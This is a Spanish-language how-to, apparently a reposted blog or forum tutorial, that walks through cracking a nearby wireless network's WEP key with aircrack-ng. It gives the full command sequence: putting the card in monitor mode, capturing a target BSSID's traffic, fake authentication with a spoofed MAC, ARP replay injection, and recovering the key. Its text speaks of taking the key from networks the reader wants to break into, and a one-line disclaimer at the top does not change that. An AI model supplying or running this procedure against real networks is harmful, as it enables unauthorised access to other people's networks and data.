Esto es sólo una prueba experimental y en ningún momento se trata de incurrir en abrir espacios privados. Les dejo este peque-tutorial, miniguía, paso a paso. Ojalá les sirva.

Desde línea de comandos, para cifrado wep:

sudo apt-get install aircrack-ng

Antes que todo debes desconectarte de cualquier red y desactivar la red, sólo dejar encendida, por supuesto, la tarjeta wifi.

Vemos nuestras tarjetas wifi con:

iwconfig

Paramos (stop-stop-stop. target!!!) nuestra tarjeta (en mi caso es el nombre wlan0) tarjeta para ir al modo monitor:

sudo airmon-ng stop wlan0

Activamos nuestra tarjeta en modo monitor (a volar):

sudo airmon-ng start wlan0

Ahora le decimos que monitoré todas las redes cercanas, ya en modo monitor (mn0). De preferencia deben ser redes que tengan buena señal y estén por arriba del valor 50:

sudo airodump-ng mon0

Fíjate bien en dos datos del modem de internet al que le sacaremos la clave y que ahora debes ver en tu shell o terminal Linux, porque necesitaremos esos datos. Primero, el canal en donde está, en mi caso fue el 11, y el bssid, que es el que se muestra. Debes cambiar esos dos valores al que quieres interceptar. Le decimos que escriba (-w) un archivo que se fraccionará en cuatro llamado captura en la carpeta donde abriste tu shell. Puedes cambiar el nombre captura y ponerle el que quieras, tal vez el nombre de tu mascota o bakara (ese es muy efectivo), Con la tecla control y la letra C, a la vez, paramos el monitoreo -esto es importante- Abrimos otra terminal y seguimos:

sudo airodump-ng –channel 11 –bssid 00:0D:72:27:AE:D1 -w captura mon0

Abres otra terminal y dejas trabajando la anterior. Escribes el nombre de la red que quieres tronar en el espacio “WIRE256″ que fuen la que utilicé. LO demás lo dejamos tal cual, y si te fijas damos un bsssid falso para bajar paquetes:

sudo aireplay-ng -1 0 -e 2WIRE256 -a 00:0D:72:27:AE:D1 -h 11:22:33:44:55:66 mon0

Abrimos otra terminal y escribimos otra vez (cambia solamente en esta línea de comandos el valor de la bssid por el que manejas ahora):

sudo aireplay-ng -3 -b 00:0D:72:27:AE:D1 -h 11:22:33:44:55:66 mon0

Te debe dar unos 15 mil ARP y más de 100mil hacks para que funcione. Cuando los tengas, abres otra terminal y escribes para desencriptar los paquetes:

sudo aircrack-ng -z *.cap

Al final de la shell debe quedar así:

KEY FOUND! [ 12:78:12:78:12 ]
Decrypted correctly: 100%

Es decir, la clave es 1278127812

Y voila!!

Espero les sirva porque a mi sí. Un dato, si haces otra captura, borra los archivos que te crea, los cuatro de captura, bakará o el nombre que le pusiste y el .cap. Hasta que te resulte. Hay que tener paciencia y busca redes con buena transmisión de paquetes para que te funcione rápido, en menos de 15 minutos.

Fuente ubuntu-es